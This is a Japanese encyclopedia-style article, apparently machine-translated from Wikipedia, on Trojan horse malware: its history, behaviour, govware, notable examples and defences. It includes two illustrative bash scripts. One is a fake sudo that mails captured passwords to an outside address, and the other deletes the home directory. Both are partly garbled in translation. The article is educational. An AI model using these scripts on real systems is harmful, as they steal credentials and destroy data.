コンピューターの世界では、トロイの木馬(または単にトロイの木馬)とは、標準的なプログラムを装ってユーザーを欺き、真の目的を誤らせるマルウェアのことです。この用語は、トロイの街を陥落させた欺瞞的なトロイの木馬に関する古代ギリシャの物語に由来しています。[1]
トロイの木馬は、一般的に何らかのソーシャルエンジニアリングによって拡散されます。たとえば、ユーザーが騙されて、無害に見えるように偽装された電子メールの添付ファイル(記入する通常のフォームなど)を実行したり、ソーシャルメディアやその他の場所で偽の広告をクリックしたりします。ペイロードは何でも構いませんが、最近の多くのフォームはバックドアとして機能し、コントローラーに連絡して、影響を受けたコンピューターに不正にアクセスできるようになります。[2] ランサムウェア攻撃は、多くの場合、トロイの木馬を使用して実行されます。
コンピュータウイルスやワームとは異なり、トロイの木馬は通常、他のファイルに自分自身を注入したり、自分自身を増殖させたりすることはありません。[3]
用語の使用
この概念と用語が最初にどこでいつ使用されたかは明らかではありませんが、1971年までに最初のUnixマニュアルでは読者が両方を知っているものと想定されていました。[4]
もう一つの初期の言及は、1974年の米国空軍のMulticsコンピュータシステムの脆弱性の分析に関する報告書です。[5]
これは、ケン・トンプソンが1983年にチューリング賞受賞講演「信頼の考察」[6]で有名になった。その講演の副題は「プログラムにトロイの木馬が存在しないという声明をどの程度まで信じるべきだろうか。ソフトウェアを書いた人を信頼することの方が重要かもしれない」であった。彼は、Multicsのセキュリティに関するレポートからトロイの木馬が存在する可能性があることを知ったと述べている。[7] [8]
行動
トロイの木馬はインストールされると、さまざまな悪意のある動作を実行する可能性があります。多くのトロイの木馬は、インターネットを介して 1 つ以上のコマンド アンド コントロール(C2) サーバーに接続し、指示を待ちます。個々のトロイの木馬は通常、この通信に特定のポート セットを使用するため、検出は比較的簡単です。さらに、他のマルウェアがトロイの木馬を「乗っ取り」、悪意のある動作のプロキシとして使用する可能性があります。[9]
ドイツ語圏の国では、政府が使用または作成したスパイウェアはgovwareと呼ばれることがあります。Govwareは通常、標的のコンピュータからの通信を傍受するために使用されるトロイの木馬ソフトウェアです。スイスやドイツなどの一部の国では、このようなソフトウェアの使用を規制する法的枠組みがあります。[10] [11] govwareトロイの木馬の例には、スイスのMiniPanzerとMegaPanzer [12]、およびR2D2というニックネームのドイツの「国家トロイの木馬」があります。[10]ドイツのgovwareは、一般の人々に知られていないセキュリティギャップを悪用し、他のアプリケーションによって暗号化される前にスマートフォンのデータにアクセスすることによって機能します。[13]
ハッカーの間でボットネットが人気を集め、作成者がユーザーのプライバシーを侵害できる広告サービスが利用できるようになったため、トロイの木馬はますます一般的になっています。2009年 1 月から 6 月にかけてBitDefenderが実施した調査によると、「トロイの木馬型マルウェアが増加しており、世界中で検出されたマルウェアの 83% を占めています。」トロイの木馬はワームと関係があり、ワームの助けを借りて拡散し、ワームとともにインターネットを移動します。[14] BitDefender は、約 15% のコンピューターがボットネットのメンバーであり、通常はトロイの木馬感染によってリクルートされていると述べています。[15]
最近の調査により、トロイの木馬の手法がクラウドコンピューティングシステムへの攻撃に使用されていることが明らかになりました。クラウドシステムに対するトロイの木馬攻撃は、機能の変更や停止によってクラウドサービスに影響を与える可能性のあるアプリケーションまたはサービスをシステムに挿入しようとします。クラウドシステムが攻撃を正当なものと認識すると、クラウドシステムに損害を与えたり感染させたりする可能性のあるサービスまたはアプリケーションが実行されます。[16]
Linux sudo の例
トロイの木馬は、正当な機能を実行するように見せかけて、実行するとユーザーのセキュリティを侵害するプログラムです。 [17]簡単な例として、Linux sudoコマンドの次の悪意のあるバージョンがあります。攻撃者は、このスクリプトをパブリックに書き込み可能なディレクトリ (など/tmp) に配置します。管理者がこのディレクトリにいて を実行するとsudo、トロイの木馬が実行され、管理者のパスワードが侵害される可能性があります。
#!/usr/bin/env バッシュ
# 画面への文字エコーをオフにします。sudo は、ユーザーがパスワードを入力したときに画面に表示されないようにするためにこれを行います
。stty -echo
# ユーザーにパスワードを要求し、入力内容を読み取ります。この悪意のあるバージョンの性質を隠すには、ユーザーが間違ったパスワードを入力したときの sudo の動作を模倣して、これを 3 回実行します。
prompt_count = 1
while [ $prompt_count -le 3 ] ; do echo -n "[sudo] password for $( whoami ) : " read password_input
echo sleep 3 # sudo は繰り返しプロンプトの間に一時停止しますprompt_count = $(( prompt_count + 1 )) done
# 文字エコーをオンに戻します
。stty echo
echo $password_input | mail -s " $( whoami )のパスワード" outside@creep.com
# sudo の実際のエラー メッセージを表示し、自分自身を削除します。
echo "sudo: 3 回の間違ったパスワード試行"
rm $0
exit 1 # sudoはパスワード入力に失敗すると1を返します
sudo トロイの木馬を防ぐためには、環境変数.のエントリをPATH末尾に配置する必要があります。[18]例PATH=/usr/local/bin:/usr/bin:.:
Linux ls の例
PATH のどこかにがあると.便利ですが、落とし穴があります。[19]もう 1 つの例は、次の Linux lsコマンドの悪意のあるバージョンです。ただし、ファイル名は ではなくls、 ですsl。攻撃者はこのスクリプトをパブリックに書き込み可能なディレクトリ (例: /tmp) に配置します。
#!/usr/bin/env バッシュ
# ユーザーのホームディレクトリを削除し、自分自身を削除します。rm -fr
~ 2 > /dev/null
rm $0
悪意のあるプログラマーがこのよくある入力ミスを予測するのを防ぐには、次の手順を実行します。
.PATHを省略するか、alias sl=ls[あ]
注目すべき例
民間および政府
- アノム– FBI
- 0zapftis / r2d2 StaatsTrojaner – DigiTask
- FinFisher – レンチ IT ソリューション / ガンマ インターナショナル
- DaVinci / Galileo RCS – HackingTeam
- マジックランタン– FBI
- SUNBURST – SVR / Cozy Bear(疑わしい)
- タオ・クォンタム/フォクサシッド– NSA
- 戦士のプライド– GCHQ
公開中
- EGABTR – 1980年代後半
- ネットバス– 1998年(出版)[20]
- Sub7 by Mobman – 1999年(出版)
- バックオリフィス– 1998年(出版)
- Y3K、ツェレンティス兄弟著 – 2000年(出版)
- ビースト– 2002年(出版)
- Bifrost トロイの木馬– 2004 (公開)
- DarkComet – 2008-2012 (出版済み)
- ブラックホール エクスプロイト キット– 2012 年 (公開)
- Gh0st RAT – 2009 (出版)
- メガパンツァーブンデストロイアナー– 2009年(出版)[21] [22]
- MEMZ by Leurak – 2016 (出版)
セキュリティ研究者によって検出
- 12トリック– 1990
- Clickbot.A – 2006年(発見)
- ゼウス– 2007年(発見)
- フラッシュバックトロイの木馬– 2011 年 (発見)
- ZeroAccess – 2011年(発見)
- Koobface – 2008年(発見)
- ヴンド– 2009年(発見)
- コアフラッド– 2010年(発見)
- Tiny Banker Trojan – 2012 年 (発見)
- SOVA – 2022年(発見)[23]
- Shedun Androidマルウェア – 2015年(発見)[24] [25] [26] [27] [28] [29]
大文字の使用
コンピュータ用語の「トロイの木馬」は、古代都市トロイの伝説のトロイの木馬に由来しています。このため、「Trojan」は大文字で表記されることが多いです。しかし、スタイルガイドや辞書によって異なるものの、通常は小文字の「trojan」を使用することを推奨するものが多くあります。[30] [31]
参照
- コンピュータセキュリティ – 情報漏洩、盗難、損傷からコンピュータシステムを保護する
- カッコウの卵(比喩) – 托卵の比喩
- サイバースパイ – インターネットを使って秘密を入手する
- 踊る豚 – ユーザーのITセキュリティに対する無関心
- エクスプロイト(コンピュータセキュリティ) – コンピュータシステムへの攻撃方法
- 産業スパイ – 安全保障ではなく商業目的でのスパイ活動
- ハードウェアトロイの木馬 – ハードウェアに埋め込まれたマルウェア。ソフトウェアの脆弱性よりも検出と修正が困難
- フィッシング – ソーシャルエンジニアリングの一形態
- 最小権限の原則 – 必要なアクセスのみを許可することでセキュリティを確保
- プライバシー侵害ソフトウェア – 商業目的でユーザーのプライバシーを無視するコンピュータソフトウェア
- リモート管理 – 遠隔地からのコンピュータの制御と使用
- リモート管理ソフトウェア – ローカルデバイスからリモートで実行されるデスクトップ
- リバース接続 – ネットワーク接続タイプは、開いているポートのファイアウォール制限を回避します
- 不正なセキュリティソフトウェア – 悪意のあるソフトウェアの形態
- 詐欺師 – 個人またはグループを騙そうとする
- テクニカルサポート詐欺 – 詐欺と信用詐欺の種類
- コンピュータウイルスとワームのタイムライン – コンピュータマルウェアのタイムライン
- ゾンビ(コンピュータサイエンス) – ネットワーク上で悪意のあるタスクに使用される侵害されたコンピュータ
参考文献
- ^ 「トロイの木馬の定義」 。 2012年4月5日閲覧。
ギリシャの兵士たちは、長年の戦争でトロイの街の防御を突破することができず、平和の贈り物として大きな木馬を街に贈りました。
- ^ 「ウイルス、ワーム、トロイの木馬の違い」。Symantec Security Center。Broadcom Inc. 2013年8月19日時点のオリジナルよりアーカイブ。2020年3月29日閲覧。
- ^ 「VIRUS-L/comp.virus よくある質問 (FAQ) v2.00 (質問 B3: トロイの木馬とは何ですか?)」。1995年10月9日。2020年8月5日時点のオリジナルよりアーカイブ。 2019年9月16日閲覧。
- ^ Thompson, Ken; Ritchie, Dennis M. 「Unix Programmer's Manual、1971 年 11 月 3 日」(PDF)。p. 5 。2020 年3 月 28 日閲覧。
また、set-user-ID ビットがオンになっているファイルの所有者を変更することはできません。そうしないと、他人のファイルを悪用できるトロイの木馬が作成される可能性があります。
- ^ Karger, PA; Schell, RR、「Multics セキュリティ評価: 脆弱性分析、ESD-TR-74-193」(PDF)、HQ 電子システム部門: Hanscom AFB、MA、II 、 2011 年 7 月 9 日のオリジナル(PDF)からアーカイブ、 2017 年12 月 24 日取得
- ^ ケン・トンプソン (1984). 「信頼の信頼についての考察」. Commun. ACM . 27 (8): 761–763. doi : 10.1145/358198.358210 .。
- ^ Paul A. Karger、Roger R. Schell (2002)、「30年後:Multicsセキュリティ評価からの教訓」(PDF)、ACSAC:119–126
- ^ カーガーとシェルは、トンプソンがチューリング会議の後の版でこの言及を追加したと書いている:ケン・トンプソン (1989年11月)、「信頼の信頼について」、Unix Review、7 (11): 70–74
- ^ Crapanzano, Jamie (2003). 「トロイの木馬サブセブンの解体(レポート)」SANS Institute . 2021年5月10日閲覧。
- ^ バジル・クパ著「トロイの木馬の復活:政府スパイウェア(Govware)の使用の合法性について」LISS 2013、pp. 419–428
- ^ 「Häufig gestellte Fragen (よくある質問)」。連邦司法警察省。2013年5月6日時点のオリジナルよりアーカイブ。
- ^ Dunn, John (2009年8月27日). 「スイスのプログラマーが政府のスパイを狙うトロイの木馬を公開」. TechWorld . 2014年1月26日時点のオリジナルよりアーカイブ。2021年1月10日閲覧。
- ^ 「ドイツ連邦警察、トロイの木馬ウイルスを使って電話の暗号化を回避」DW 2018年4月14日閲覧。
- ^ 「BitDefender マルウェアおよびスパム調査で、オンライン行動の傾向に適応する電子脅威が判明」BitDefender。2009 年 8 月 8 日時点のオリジナルよりアーカイブ。2020年3 月 27 日閲覧。
- ^ Datta, Ganesh (2014年8月7日). 「トロイの木馬とは何か?」SecurAid . 2014年8月12日時点のオリジナルよりアーカイブ。 2020年3月27日閲覧。
- ^ Kanaker, Hasan; Karim, Nader Abdel; Awwad, Samer AB; Ismail, Nurul HA; Zraqou, Jamal; Ali, Abdulla MF Al (2022年12月20日). 「機械学習を使用したクラウドベース環境でのトロイの木馬感染検出」. International Journal of Interactive Mobile Technologies . 16 (24): 81–106. doi : 10.3991/ijim.v16i24.35763 . ISSN 1865-7923.
- ^ Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX システムセキュリティ. Hayden Books. p. 42. ISBN 0-8104-6267-2。
- ^ Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX システムセキュリティ. Hayden Books. p. 43. ISBN 0-8104-6267-2上記のトロイの木馬は、
ユーザーの PATH がシステムのディレクトリを検索する前に現在のディレクトリでコマンドを検索するように設定されている場合にのみ機能します。
- ^ 「$PATH に '.' があると何が問題なの?」。ペンシルバニア大学工学部。2023年11 月 28 日閲覧。
[I] もしあなたが不器用なタイピストで、ある日「ls -l」の代わりに「sl -l」と入力すると、「./sl」(もしあれば)を実行する危険があります。一部の「賢い」プログラマーは、よくある入力ミスを予測して、それらの名前のプログラムをパブリック ディレクトリ全体に散らばらせておく可能性があります。注意してください。
- ^ Seth, Kulakow (1998)。「これはまだトロイの木馬なのか、それとも実際に有効なリモートコントロール管理ツールなのか?」(レポート)。SANS Institute 。 2021年5月10日閲覧。
- ^ 「Mega-Panzer」。SourceForge。2016年9月21日。
- ^ 「Mini-Panzer」。SourceForge。2016年9月18日。
- ^ 「SOVAウイルスとは何か?」。India Today。2022年9月16日。
- ^ 「トロイの木馬化されたアドウェア ファミリーがアクセシビリティ サービスを悪用して、任意のアプリをインストール – Lookout ブログ」。
- ^ Neal, Dave (2015年11月20日). 「Shedun trojan adware is healing the Android Accessibility Service」The Inquirer . Incisive Business Media. 2015年11月22日時点のオリジナルよりアーカイブ。 2020年3月27日閲覧。
{{cite web}}: CS1 maint: unfit URL (link) - ^ 「Lookout が新たなトロイの木馬化されたアドウェアを発見。2 万種類の人気アプリが攻撃の標的に – Lookout ブログ」。
- ^ 「Shuanet、ShiftyBug、Shedun マルウェアが Android を自動ルート化する可能性」2015 年 11 月 5 日。
- ^ Times、Tech (2015 年 11 月 9 日)。「事実上削除不可能な Android マルウェアの新ファミリー: Shedun、Shuanet、ShiftyBug にご挨拶」。
- ^ 「Android アドウェアは、ユーザーが明示的に拒否した場合でも、自動的にインストールされる可能性があります」。2015 年 11 月 19 日。
- ^ 「トロイの木馬」。コリンズ上級辞書。2020年3月29日閲覧。
- ^ 「トロイの木馬」。Microsoftスタイル ガイド。Microsoft。2020年3 月 29 日閲覧。
注記
- ^ /etc/profileに記述してください
alias
